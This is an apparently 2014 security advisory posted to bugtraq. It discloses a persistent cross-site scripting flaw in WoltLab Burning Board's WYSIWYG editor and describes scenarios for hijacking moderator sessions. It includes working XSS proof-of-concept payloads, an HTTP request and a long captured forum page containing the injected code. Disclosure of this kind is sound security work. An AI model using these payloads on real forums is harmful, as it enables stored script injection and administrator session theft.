Woltlab Burning Board 3.9.1 pl1 - Persistent Web Vulnerability & Editor Reverse Encoding Issue
- To: bugtraq@xxxxxxxxxxxxxxxxx, bugs@xxxxxxxxxxxxxxxxxxx
- Subject: Woltlab Burning Board 3.9.1 pl1 - Persistent Web Vulnerability & Editor Reverse Encoding Issue
- From: Vulnerability Lab <research@xxxxxxxxxxxxxxxxxxxxx>
- Date: Fri, 11 Apr 2014 16:31:30 +0200
Document Title:
===============
Woltlab Burning Board 3.9.1 pl1 - Persistent Web Vulnerability & Editor Reverse Encoding Issue
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1256
Video: http://www.vulnerability-lab.com/get_content.php?id=1257
Release Date:
=============
2014-04-11
Vulnerability Laboratory ID (VL-ID):
====================================
1256
Common Vulnerability Scoring System:
====================================
3.5
Product & Service Introduction:
===============================
WoltLab Burning Board is a forum software developed by WoltLab GmbH, based on
the scripting language PHP and written in an object-oriented style. Unlike its
previous versions, it was completely rewritten in object-oriented PHP 5 and
generates markup that conforms to the current web standards XHTML 1.1 and CSS2.
Development focused on the use of semantic HTML and accessibility. The syntax of
the template system is now modelled on Smarty and offers considerably more
capabilities than version 2. Architecturally, from version 3 on, the software is
split into a framework named WoltLab Community Framework (WCF), which serves as
the foundation for developing end-user applications, and the end-user
application Burning Board 3 built on top of it. The source code of the WCF core
is released under the open-source LGPL licence.
Version 3.1 of Burning Board, released on 14 October 2009, is based on WCF
version 1.1 and brought many detail improvements and a completely reworked user
profile, which can now be extended with profile plugins such as guestbook,
gallery or blog. The free Burning Board Lite 2, released on 6 March 2008, is not
a further development of Burning Board Lite 1 but is based on the WoltLab
Community Framework and Burning Board 3. Burning Board Lite 2 is intended both
for smaller forum projects that do not need the full feature set of the full
version and as a production-ready demo of Burning Board 3. On 11 November 2010
WoltLab released Burning Board Lite 2.1. It is based on WoltLab Community
Framework 1.1 and offers features that were previously only available in paid
versions: the new user profile and the WYSIWYG editor from version 3.1, a
revised skin, a member search function, extended settings for file size, and
PM sending.
(Copy of the Homepage: http://de.wikipedia.org/wiki/WoltLab_Burning_Board )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a persistent input
validation web vulnerability in the official Woltlab GmbH Burning Board
v3.9.1 PL1 web-application.
Vulnerability Disclosure Timeline:
==================================
2014-04-11: Researcher Notification & Coordination (Ateeq ur Rehman Khan)
2014-00-00: Vendor Notification (Woltlab GmbH Security Team)
2014-00-00: Vendor Response/Feedback (Woltlab GmbH Security Team)
2014-00-00: Vendor Fix/Patch (Woltlab GmbH Developer Team)
2014-00-00: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Woltlab GmbH
Product: Woltlab Burning Board - Forum Web Application 3.9.1 PL 1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
Medium
Technical Details & Description:
================================
A persistent input validation web vulnerability has been discovered in the
official Woltlab GmbH Burning Board v3.0.9 pl1 web-application.
The issue allows remote attackers to bypass the encoding filter of the editor
and execute malicious persistent script code on the application side.
Remote attackers are able to include malicious script code while creating a
new forum thread. Since the application fails to perform proper input
sanitization through a secure re-encoding, the injected payload executes after
an administrator or moderator reviews the post and tries to `Edit` or
`Quote/MultiQuote` the same thread. The script code executes after a click on
the img resource button of the WYSIWYG editor module. The vulnerability affects
the `mce_editor_0_codeview` module. The same vulnerability is also triggered if
the moderator/administrator clicks the `Insert Image` button while in editor
mode. Clicking the img button reverse-encodes the marked short link, which
results in the execution of the injected script code via POST.
Exploitation of the vulnerability requires a low privileged user account and
low user interaction by an administrator or moderator of the forum.
Successful exploitation results in persistent application-side phishing,
application-side redirects, application-side session hijacking attacks and
persistent manipulation of the affected module context.
Request Method(s):
[+] POST
Vulnerable Module(s):
[+] mce_editor_0_codeview
Vulnerable Parameter(s):
[+] form > postID
Affected Module(s):
[+] Quote & Multi Quote Post (Editor)
[+] Edit Post (Editor)
Affected Version(s):
[+] Burning Board 3.0.9 pl 1 (Sunrise)
[+] Community Framework Version - 1.0.11 pl 4 (Horizon)
Vulnerable Package(s):
[+] com.woltlab.wcf.form.message.wysiwyg
(1.0.10 pl 3 - Date:Mar 22nd 2010 - Author: WoltLab GmbH)
Proof of Concept (PoC):
=======================
The persistent bug and filter issue can be exploited by remote attackers with a
low privileged forum application user account and low user interaction by an
administrator or moderator user account. For security demonstration or to
reproduce the vulnerability follow the provided information and steps below to
continue.
Scenario 1: Remote
1. A remote attacker includes a broken link with malicious script code to
hijack the moderator or administrator session.
2. A moderator or administrator reviews the broken post and clicks on quote or
edit to review the original source in order to fix it.
3. The moment the administrator or moderator clicks the image source edit
button through the regular editor (non-sourcecode view), the script code
executes (application-side).
Scenario 2: Local
1. A local attacker opens a post and is able to inject his own script code,
quotes his own post and clicks the image edit button to execute the code.
2. He is also able to save the link and request the cookies by usage of the
affected form=PostEdit&postID parameters.
PoC:
\'"><sCrIpt><iframe%20src=x%20onload=confirm(2)></iframe>>TEST<h1>TESTing</h1></sCrIpT>
#
"><img onerror=prompt(/POC/)
src=x></img>\'"><sCrIpt><iframe%20src=x%20onload=confirm(2)></iframe>>TEST<h1>TESTing</h1></sCrIpT>
#
"><img onerror=prompt(/POC/) src=x></img>%20"><iframe
src=javascript:\u0061lert(/Test-Ateeq-Board/)></iframe>
--- Validation Problem Editor Output after the Reverse Encode [img button] ---
[img]x[/img]\'">
">[img]x[/img]" wcf_src="
\'">
"[img]
">[img]x[/img]\'">
">[img]x[/img]" alt="
sCrIpT>
"[img]
sCrIpT>
img>" title="
sCrIpT>
"[img]
sCrIpT>
img>" /> [quote='Ateeq Ur Rehman
Khan',index.php?page=Thread&postID=31#post31][url='asdasdsad']
adsasd[/url][/img]"[/quote]
HTTP Logs:
GET /forum/index.php?form=PostAdd&postID=23&action=quote HTTP/1.1
Host: vulnerability-db.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:27.0) Gecko/20100101
Firefox/27.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://vulnerability-db.com/forum/index.php?page=Thread&threadID=15
Cookie: wcf_cookieHash=[HIDDEN]; wcf_boardLastActivityTime=1397172274;
wcf_userID=[]; wcf_password=[HIDDEN]
Connection: keep-alive
Response:
HTTP/1.1 200 OK
Server: nginx
Date: Fri, 11 Apr 2014 10:46:00 GMT
Content-Type: text/html; charset=UTF-8
Connection: keep-alive
X-Powered-By: PleskLin
Content-Length: 69495
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.1//EN"
"http://www.w3.org/TR/xhtml11/DTD/xhtml11.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" xml:lang="en"><head>
<title>Reply - test 1 - TalkBox #337 - VULNERABILITY LABORATORY -
SECURITY RESEARCH FORUM </title>
<meta http-equiv="content-type" content="text/html; charset=UTF-8" />
<meta http-equiv="content-script-type" content="text/javascript" />
<meta http-equiv="content-style-type" content="text/css" />
<meta name="description" content="advisory, vulnerabilities, vulnerability,
exploit, security, live, hack, zero day, bug, secure, hacking, research,
researcher, seals, bugs, security technics, exploits, exploit videos,
documents,
analyses, malware, attacker, attack, sec, releases, 0 day, analysts, exploiter,
release, bug bounty, reward" />
<meta name="keywords" content="advisory, vulnerabilities, vulnerability,
exploit, security, live, hack, zero day, bug, secure, hacking, research,
researcher, seals, bugs, security technics, exploits, exploit videos,
documents, analyses,
malware, attacker, attack, sec, releases, 0 day, analysts, exploiter, release,
bug bounty, reward" />
<meta name="robots" content="noindex,nofollow" />
<!-- wbb styles -->
<link rel="stylesheet" type="text/css" media="screen"
href="style/burningBoard.css" />
<!-- dynamic styles -->
<link rel="stylesheet" type="text/css" media="screen"
href="wcf/style/style-1.css" />
<!-- print styles -->
<link rel="stylesheet" type="text/css" media="print"
href="wcf/style/extra/print.css" />
<script type="text/javascript">
//<![CDATA[
var SID_ARG_2ND = '';
var RELATIVE_WCF_DIR = 'wcf/';
var RELATIVE_WBB_DIR = '';
//]]>
</script>
<!-- hack styles -->
<!--[if lt IE 7]>
<link rel="stylesheet" type="text/css" media="screen"
href="wcf/style/extra/ie6-fix.css" />
<style type="text/css">
#page { /* note: non-standard style-declaration */
_width:
expression(((document.body.clientWidth/screen.width)) < 0.7 ? "760px":"80%" );
}
</style>
<![endif]-->
<!--[if IE 7]>
<link rel="stylesheet" type="text/css" media="screen"
href="wcf/style/extra/ie7-fix.css" />
<![endif]-->
<script type="text/javascript" src="wcf/js/default.js"></script>
<script type="text/javascript" src="wcf/js/PopupMenuList.class.js"></script>
<script type="text/javascript" src="wcf/js/AjaxRequest.class.js"></script>
<script type="text/javascript"
src="wcf/js/TabbedPane.class.js"></script>
<script type="text/javascript"
src="wcf/js/ImageResizer.class.js"></script>
<script type="text/javascript" src="wcf/js/Wysiwyg.class.js"></script>
<script type="text/javascript">
//<![CDATA[
// language
var language = new Object();
language['undo.desc'] = "Undo";
language['redo.desc'] = "Redo";
language['b.desc'] = "Bold";
language['i.desc'] = "Italic";
language['u.desc'] = "Underline";
language['s.desc'] = "Strike through";
language['toolbar.focus'] = "Select toolbar";
language['link.desc'] = "Insert link";
language['link.insert.url'] = "Enter the complete address of the link:";
language['link.insert.url.optional'] = "Enter the complete address of the link (optional):";
language['link.insert.name'] = "Enter a linkname (optional)";
language['unlink.desc'] = "Remove link";
language['insertText'] = "Insert text to format (optional).";
language['textAlignLeft.desc'] = "Align left";
language['textAlignCenter.desc'] = "Align center";
language['textAlignRight.desc'] = "Align right";
language['textJustify.desc'] = "Justify";
language['bullist.desc'] = "Unordered list";
language['numlist.desc'] = "Ordered list";
language['cut.desc'] = "Cut";
language['copy.desc'] = "Copy";
language['paste.desc'] = "Paste";
language['img.desc'] = "Insert image";
language['image.insert'] = "Please enter the URL of the image.";
language['color.desc'] = "Select font colour";
language['fontsize.default'] = "Font size";
language['fontFamily.default'] = "Font family";
language['quotation.desc'] = "Insert quotes";
language['quote.desc'] = "Insert quotation";
language['code.desc'] = "Insert code";
language['view.wysiwyg'] = "Editor";
language['view.code'] = "Source code";
language['noFormElement'] = "Error: Could not find the target element.";
language['extraBBCodeNotValid'] = "Your input is not correct.";
// language direction
var languageDirection = "ltr";
// smileys
var smilies = new Object();
smilies[':)'] = new Array('wcf\/images\/smilies\/smile.png', 'smile');
smilies[':('] = new Array('wcf\/images\/smilies\/sad.png', 'sad');
smilies[';)'] = new Array('wcf\/images\/smilies\/wink.png', 'wink');
smilies[':P'] = new Array('wcf\/images\/smilies\/tongue.png', 'tongue');
smilies['8)'] = new Array('wcf\/images\/smilies\/cool.png', 'Cool');
smilies[':D'] = new Array('wcf\/images\/smilies\/biggrin.png',
'biggrin');
smilies[';('] = new Array('wcf\/images\/smilies\/crying.png', 'crying');
smilies[':rolleyes:'] = new Array('wcf\/images\/smilies\/rolleyes.png',
'rolleyes');
smilies[':huh:'] = new Array('wcf\/images\/smilies\/huh.png', 'Huh');
smilies[':S'] = new Array('wcf\/images\/smilies\/unsure.png', 'unsure');
smilies[':love:'] = new Array('wcf\/images\/smilies\/love.png', 'love');
smilies['X('] = new Array('wcf\/images\/smilies\/angry.png', 'angry');
smilies['8|'] = new Array('wcf\/images\/smilies\/blink.png', 'blink');
smilies['?('] = new Array('wcf\/images\/smilies\/confused.png',
'confused');
smilies[':cursing:'] = new Array('wcf\/images\/smilies\/cursing.png',
'cursing');
smilies[':|'] = new Array('wcf\/images\/smilies\/mellow.png', 'mellow');
smilies[':thumbdown:'] = new
Array('wcf\/images\/smilies\/thumbdown.png', 'thumbdown');
smilies[':thumbsup:'] = new Array('wcf\/images\/smilies\/thumbsup.png',
'thumbsup');
smilies[':thumbup:'] = new Array('wcf\/images\/smilies\/thumbup.png',
'thumbup');
smilies['8o'] = new Array('wcf\/images\/smilies\/w00t.png', 'w00t');
smilies[':pinch:'] = new Array('wcf\/images\/smilies\/pinch.png',
'pinch');
smilies[':sleeping:'] = new Array('wcf\/images\/smilies\/sleeping.png',
'sleeping');
smilies[':wacko:'] = new Array('wcf\/images\/smilies\/wacko.png',
'wacko');
smilies[':whistling:'] = new
Array('wcf\/images\/smilies\/whistling.png', 'whistling');
smilies[':evil:'] = new Array('wcf\/images\/smilies\/evil.png', 'evil');
smilies['^^'] = new Array('wcf\/images\/smilies\/squint.png', 'squint');
smilies[':?:'] = new Array('wcf\/images\/smilies\/question.png',
'question');
smilies[':!:'] = new Array('wcf\/images\/smilies\/attention.png',
'attention');
// bbcodes
var coreBBCodes = new Object();
var extraBBCodes = new Object();
var sourceCodes = new Object();
var tmpBBCode = { wysiwyg:1, bbCode:'b',
htmlOpen:'strong', htmlClose:'strong', icon:'fontStyleBoldM.png', sourceCode:0,
attributes:[] };
coreBBCodes['b'] = tmpBBCode;
language['b.title'] = "wcf.bbcode.b.title";
var tmpBBCode = { wysiwyg:1, bbCode:'i', htmlOpen:'em', htmlClose:'em',
icon:'fontStyleItalicM.png', sourceCode:0, attributes:[] };
coreBBCodes['i'] = tmpBBCode;
language['i.title'] = "wcf.bbcode.i.title";
var tmpBBCode = { wysiwyg:1, bbCode:'u', htmlOpen:'span style="text-decoration: underline"',
htmlClose:'span', icon:'fontStyleUnderlineM.png', sourceCode:0, attributes:[] };
coreBBCodes['u'] = tmpBBCode;
language['u.title'] = "wcf.bbcode.u.title";
var tmpBBCode = { wysiwyg:1, bbCode:'s', htmlOpen:'span style="text-decoration: line-through"',
htmlClose:'span', icon:'fontStyleStriketroughM.png', sourceCode:0, attributes:[] };
coreBBCodes['s'] = tmpBBCode;
language['s.title'] = "wcf.bbcode.s.title";
var tmpBBCode = { wysiwyg:0, bbCode:'sub', htmlOpen:'sub', htmlClose:'sub',
icon:'', sourceCode:0, attributes:[] };
extraBBCodes['sub'] = tmpBBCode;
language['sub.title'] = "wcf.bbcode.sub.title";
var tmpBBCode = { wysiwyg:0, bbCode:'sup', htmlOpen:'sup', htmlClose:'sup',
icon:'', sourceCode:0, attributes:[] };
extraBBCodes['sup'] = tmpBBCode;
language['sup.title'] = "wcf.bbcode.sup.title";
var tmpBBCode = { wysiwyg:0, bbCode:'email', htmlOpen:'a', htmlClose:'a',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'href="mailto:%s"',
validationPattern:'^[^\\s]+@[^\\s]+$', required:1
}] };
extraBBCodes['email'] = tmpBBCode;
language['email.title'] = "wcf.bbcode.email.title";
language['email.attribute1.promptText'] = "wcf.bbcode.email.promptText";
var tmpBBCode = { wysiwyg:1, bbCode:'color', htmlOpen:'span',
htmlClose:'span', icon:'fontColorPickerEmptyM.png', sourceCode:0, attributes:[{
attributeHTML:'style="color: %s"',
validationPattern:'^[0-9a-z#]+$', required:1 }] };
coreBBCodes['color'] = tmpBBCode;
language['color.title'] = "wcf.bbcode.color.title";
language['color.attribute1.promptText'] = "wcf.bbcode.color.promptText";
var tmpBBCode = { wysiwyg:1, bbCode:'size', htmlOpen:'span', htmlClose:'span',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'style="font-size: %dpt"',
validationPattern:'^([89]{1}|[1-3]{1}[0-9]{1})$', required:1 }] };
coreBBCodes['size'] = tmpBBCode;
language['size.title'] = "wcf.bbcode.size.title";
language['size.attribute1.promptText'] = "wcf.bbcode.size.promptText";
var tmpBBCode = { wysiwyg:1, bbCode:'font', htmlOpen:'span', htmlClose:'span',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'style="font-family: %s"',
validationPattern:'^[^"\';}\\(\\)]*$',
required:1 }] };
coreBBCodes['font'] = tmpBBCode;
language['font.title'] = "wcf.bbcode.font.title";
language['font.attribute1.promptText'] = "wcf.bbcode.font.promptText";
var tmpBBCode = { wysiwyg:1, bbCode:'align', htmlOpen:'div', htmlClose:'div',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'style="text-align: %s"',
validationPattern:'^(left|right|center|justify)$', required:1 }] };
coreBBCodes['align'] = tmpBBCode;
language['align.title'] = "wcf.bbcode.align.title";
language['align.attribute1.promptText'] = "wcf.bbcode.align.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'quote', htmlOpen:'', htmlClose:'',
icon:'quoteM.png', sourceCode:0, attributes:[{ attributeHTML:'',
validationPattern:'', required:0 }, { attributeHTML:'',
validationPattern:'', required:0 }] };
coreBBCodes['quote'] = tmpBBCode;
language['quote.title'] = "Quoted{if $quoteAuthor} from "{@$quoteAuthor}"{/if}";
language['quote.attribute1.promptText'] = "wcf.bbcode.quote.promptText";
language['quote.attribute2.promptText'] = "wcf.bbcode.quote.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'code', htmlOpen:'', htmlClose:'',
icon:'insertCodeM.png', sourceCode:1, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:0 }] };
coreBBCodes['code'] = tmpBBCode;
sourceCodes['code'] = 'code'; language['code.title'] = "Source code";
language['code.attribute1.promptText'] = "wcf.bbcode.code.promptText";
var tmpBBCode = { wysiwyg:1, bbCode:'img', htmlOpen:'img', htmlClose:'',
icon:'insertImageM.png', sourceCode:0, attributes:[{ attributeHTML:'src="%s" class="resizeImage" alt=""',
validationPattern:'^[^?\\s]+$', required:1 }, { attributeHTML:'style="float: %s"',
validationPattern:'^(left|right)$', required:0 }] };
coreBBCodes['img'] = tmpBBCode;
language['img.title'] = "wcf.bbcode.img.title";
language['img.attribute1.promptText'] = "wcf.bbcode.img.promptText";
language['img.attribute2.promptText'] = "wcf.bbcode.img.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'url', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'^.+$',
required:1 }] };
coreBBCodes['url'] = tmpBBCode;
language['url.title'] = "wcf.bbcode.url.title";
language['url.attribute1.promptText'] = "wcf.bbcode.url.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'list', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'',
validationPattern:'^(1|a|none|circle|square|disc|decimal|lower-roman|upper-roman|decimal-leading-zero|lower-greek|lower-latin|upper-latin|armenian|georgian)$',
required:0 }] };
coreBBCodes['list'] = tmpBBCode;
language['list.title'] = "wcf.bbcode.list.title";
language['list.attribute1.promptText'] = "wcf.bbcode.list.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'attach', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:1 }] };
extraBBCodes['attach'] = tmpBBCode;
language['attach.title'] = "wcf.bbcode.attach.title";
language['attach.attribute1.promptText'] = "wcf.bbcode.attach.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'tpl', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$',
required:0 }] };
extraBBCodes['tpl'] = tmpBBCode;
sourceCodes['tpl'] = 'tpl'; language['tpl.title'] = "Template source code";
language['tpl.attribute1.promptText'] = "wcf.bbcode.tpl.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'xml', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$',
required:0 }] };
extraBBCodes['xml'] = tmpBBCode;
sourceCodes['xml'] = 'xml'; language['xml.title'] = "XML";
language['xml.attribute1.promptText'] = "wcf.bbcode.xml.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'html', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:1, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:0 }] };
extraBBCodes['html'] = tmpBBCode;
sourceCodes['html'] = 'html'; language['html.title'] = "HTML";
language['html.attribute1.promptText'] = "wcf.bbcode.html.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'css', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$',
required:0 }] };
extraBBCodes['css'] = tmpBBCode;
sourceCodes['css'] = 'css'; language['css.title'] = "Cascading style sheet";
language['css.attribute1.promptText'] = "wcf.bbcode.css.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'mysql', htmlOpen:'', htmlClose:'',
icon:'insertMysqlM.png', sourceCode:1, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:0 }] };
extraBBCodes['mysql'] = tmpBBCode;
sourceCodes['mysql'] = 'mysql'; language['mysql.title'] = "MySQL queries";
language['mysql.attribute1.promptText'] = "wcf.bbcode.mysql.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'java', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:1, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:0 }] };
extraBBCodes['java'] = tmpBBCode;
sourceCodes['java'] = 'java'; language['java.title'] = "Java source code";
language['java.attribute1.promptText'] = "wcf.bbcode.java.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'php', htmlOpen:'', htmlClose:'',
icon:'insertPhpM.png', sourceCode:1, attributes:[{ attributeHTML:'',
validationPattern:'^\\d+$', required:0 }] };
extraBBCodes['php'] = tmpBBCode;
sourceCodes['php'] = 'php'; language['php.title'] = "PHP Source code";
language['php.attribute1.promptText'] = "wcf.bbcode.php.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'clipfish', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }] };
extraBBCodes['clipfish'] = tmpBBCode;
language['clipfish.title'] = "Clipfish video";
language['clipfish.attribute1.promptText'] = "wcf.bbcode.clipfish.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'googlevideo', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }] };
extraBBCodes['googlevideo'] = tmpBBCode;
language['googlevideo.title'] = "Google video";
language['googlevideo.attribute1.promptText'] =
"wcf.bbcode.googlevideo.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'myspace', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }] };
extraBBCodes['myspace'] = tmpBBCode;
language['myspace.title'] = "MySpace video";
language['myspace.attribute1.promptText'] = "wcf.bbcode.myspace.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'myvideo', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }, { attributeHTML:'',
validationPattern:'^(s|m|l|S|M|L)$', required:0 }] };
extraBBCodes['myvideo'] = tmpBBCode;
language['myvideo.title'] = "MyVideo video";
language['myvideo.attribute1.promptText'] = "wcf.bbcode.myvideo.promptText";
language['myvideo.attribute2.promptText'] = "wcf.bbcode.myvideo.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'youtube', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }, { attributeHTML:'',
validationPattern:'^wide$', required:0 }] };
extraBBCodes['youtube'] = tmpBBCode;
language['youtube.title'] = "YouTube video";
language['youtube.attribute1.promptText'] = "wcf.bbcode.youtube.promptText";
language['youtube.attribute2.promptText'] = "wcf.bbcode.youtube.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'sevenload', htmlOpen:'', htmlClose:'',
icon:'', sourceCode:0, attributes:[{ attributeHTML:'', validationPattern:'',
required:1 }] };
extraBBCodes['sevenload'] = tmpBBCode;
language['sevenload.title'] = "Sevenload video";
language['sevenload.attribute1.promptText'] =
"wcf.bbcode.sevenload.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'js', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$',
required:0 }] };
extraBBCodes['js'] = tmpBBCode; sourceCodes['js'] =
'js'; language['js.title'] = "Javascript source code";
language['js.attribute1.promptText'] = "wcf.bbcode.js.promptText";
var tmpBBCode = { wysiwyg:0, bbCode:'c', htmlOpen:'', htmlClose:'', icon:'',
sourceCode:1, attributes:[{ attributeHTML:'', validationPattern:'^\\d+$',
required:0 }] };
extraBBCodes['c'] = tmpBBCode; sourceCodes['c'] = 'c';
language['c.title'] = "C/C++ Source code";
language['c.attribute1.promptText'] = "wcf.bbcode.c.promptText";
errorField = false;
// build editor. pass neccessary variables
tinyMCE.init({
// set active view flag (code or wysiwyg) ($editorIsActive) (default:wysiwyg)
editorIsActive : 0,
// set available views (default: both views available)
editorEnableWysiwygView : 1,
editorEnableCodeView : 1,
// set some url vars
iconURL : "wcf/icon/",
imageURL : "wcf/icon/wysiwyg/",
blankHTML : "wcf/js/blank.htm",
cssFile : "wcf/style/style-1.css",
// set editor height var ($wysiwygHeight)
height: 200,
// set page default font color var
defaultPageFontColor: '#ccc'
});
//]]>
</script></head>
<body>
<div id="page">
<a id="top"></a>
<div id="userPanel" class="userPanel">
<p id="date">
<img src="wcf/icon/dateS.png" alt="" />
<span>Friday, April 11th 2014, 12:46pm UTC+2</span>
</p>
<p id="userNote">
Welcome <a href="index.php?page=User&userID=7">Ateeq Ur
Rehman Khan</a>. </p>
<div id="userMenu">
<ul>
<li><a
href="index.php?action=UserLogout&t=fc3551d52e1c22c37818f3ed0f5fedb4772f4188"><img
src="wcf/icon/logoutS.png" alt="" /> <span>Logout</span></a></li>
<li><a href="index.php?form=UserProfileEdit"><img src="wcf/icon/profileS.png"
alt="" /> <span>My Profile</span></a></li>
<li ><a href="index.php?page=PMList"><img src="wcf/icon/pmEmptyS.png"
alt="" /> <span>Private Messages</span></a></li>
</ul>
</div>
</div>
<div id="header" class="border">
<div id="search">
<form method="post" action="index.php?form=Search">
<div class="searchContainer">
<input type="text" tabindex="5" id="searchInput" class="inputText" name="q"
value="Enter search word" />
<input type="image" tabindex="6" id="searchSubmit" class="searchSubmit
inputImage" src="wcf/icon/submitS.png" alt="Submit" />
<input type="hidden" name="types[]" value="post" />
<script type="text/javascript">
//<![CDATA[
document.getElementById('searchInput').setAttribute('autocomplete',
'off');
document.getElementById('searchInput').onfocus = function() { if
(this.value == 'Enter search word') this.value=''; };
document.getElementById('searchInput').onblur = function() { if
(this.value == '') this.value = 'Enter search word'; };
document.getElementById('searchSubmit').ondblclick = function() {
window.location = 'index.php?form=Search'; };
popupMenuList.register("searchInput");
document.getElementById('searchInput').className += "
searchOptions";
//]]>
</script>
<div class="searchInputMenu">
<div class="hidden" id="searchInputMenu">
<div class="pageMenu smallFont">
<ul>
<li><a
href="index.php?form=Search&action=unread">Unread posts</a></li>
<li><a
href="index.php?form=Search&action=unreplied">Unreplied threads</a></li>
<li><a href="index.php?form=Search&action=24h">Threads
of the last 24 hours</a></li>
<li><a href="index.php?form=Search">Advanced Search</a></li>
</ul>
</div>
</div>
</div>
<noscript>
<p><a href="index.php?form=Search">Advanced Search</a></p>
</noscript>
</div>
</form>
</div>
<div id="logo">
<h1 class="pageTitle"><a
href="index.php?page=Index">VULNERABILITY LABORATORY - SECURITY RESEARCH
FORUM</a></h1>
</div>
<div id="mainMenu" class="mainMenu">
<div><ul><li class="firstActive"><a href="index.php?page=Index"
title="Forum"><img src="icon/indexM.png" alt="" />
<span>Forum</span></a></li><li><a href="index.php?page=MembersList"
title="Members"><img
src="wcf/icon/membersM.png" alt="" /> <span>Members</span></a></li><li><a
href="index.php?page=Help" title="Help"><img src="wcf/icon/helpM.png" alt="" />
<span>Help</span></a></li><li class="last"><a href="index.php?page=LegalNotice"
title="Legal Notice"><img src="wcf/icon/legalNoticeM.png" alt="" /> <span>Legal
Notice</span></a></li></ul>
</div>
</div> </div>
<div id="main">
<ul class="breadCrumbs">
<li><a href="index.php?page=Index"><img
src="icon/indexS.png" alt="" /> <span>VULNERABILITY LABORATORY - SECURITY
RESEARCH FORUM</span></a> »</li>
<li><a href="index.php?page=Board&boardID=22"><img
src="icon/categoryS.png" alt="" /> <span># Vulnerability Laboratory - Public
Communication Forums</span></a> »</li>
<li><a href="index.php?page=Board&boardID=23"><img
src="icon/boardS.png" alt="" /> <span>TalkBox #337</span></a> »</li>
<li><a href="index.php?page=Thread&threadID=15"><img
src="icon/threadS.png" alt="" /> <span>test 1</span></a> »</li>
</ul>
<div class="mainHeadline">
<img src="icon/postReplyL.png" alt="" />
<div class="headlineContainer">
<h2>Reply</h2>
</div>
</div>
<form enctype="multipart/form-data" method="post"
action="index.php?form=PostAdd&threadID=15">
<div class="border content">
<div class="container-1">
<fieldset>
<legend>Message information</legend>
<div class="formElement">
<div class="formFieldLabel">
<label for="subject">Subject</label>
</div>
<div class="formField">
<input type="text" class="inputText" id="subject"
name="subject" value="RE: test 1" tabindex="8" />
</div>
</div>
</fieldset>
<fieldset>
<legend>Message</legend>
<div class="formElement" id="editor">
<div class="formFieldLabel">
<label for="text">Message</label>
</div>
<div class="formField">
<textarea name="text" id="text" rows="15" cols="40"
tabindex="9">[quote='Ateeq Ur Rehman
Khan',index.php?page=Thread&postID=23#post23]\'">
">[img]x[/img][size=10][align=center]
[/align][/size][/align][/size][size=10][align=center][align=center]\'"><sCrIpt><iframe%20src=x%20onload=confirm
(2)></iframe>>TEST<h1>TESTing</h1></sCrIpT>[/align]
"><img onerror=prompt(/POC/) src=x></img>
">[/align][/size][/align][/size][size=10][align=center]"
wcf_src="\'">[/align][/size][size=10][align=center]
Reference(s):
http://localhost:8080/forum/index.php?form=PostAdd&postID=23&action=quote
http://localhost:8080/forum/index.php?form=ThreadAdd&boardID=23
Picture(s):
../1.png
../2.png
../3.png
../4.png
../5.png
../6.png
../7.png
../8.png
../9.png
../10.png
Resource(s):
